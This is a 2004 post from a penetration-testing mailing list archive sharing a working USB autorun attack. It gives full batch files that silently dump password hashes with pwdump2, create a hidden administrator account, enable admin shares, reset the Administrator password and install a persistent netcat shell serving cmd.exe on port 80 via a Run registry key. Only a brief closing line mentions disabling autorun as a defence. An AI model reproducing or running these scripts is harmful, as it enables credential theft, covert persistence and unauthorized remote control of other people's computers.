Penetration Testing mailing list archives

Re: USB delivered attacks (working example)

From: <mak_pen () hotmail com>
Date: 3 Jun 2004 15:03:11 -0000

I have been using this "attack" for some time now. below are the batch files (test.bat, b.bat and autorun.inf.
autorun.inf calls test.bat)i use:

*********<BOF test.bat>
@echo off
@start /min b.bat /B
@exit
<EOF test.bat>

*********<BOF b.bat>
@explorer .
@echo off

::Displaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt

::Adding a user for me :o)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators _system32_ /add

::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
"__system__" /t REG_DWORD /d 0 /f

::Enabling Admin Shares
@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v @AutoSharewks /t reg_dword /d
1 /f

::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu

::Backdooring
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "nc directory\nc.exe -L -d -p
80 -e cmd.exe" /f

@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>

I have tried this using a flash memmory  and it works. what happens is that it opens explorer showing the current
directory so that it hides any shells that might appear, then it does a series of commands which i have documented
above.

to prevent against this i have a registry file i use to disable autorun all together. contact me if you need it at:
mak_pen(at)hotmail(dot)com

Cheers....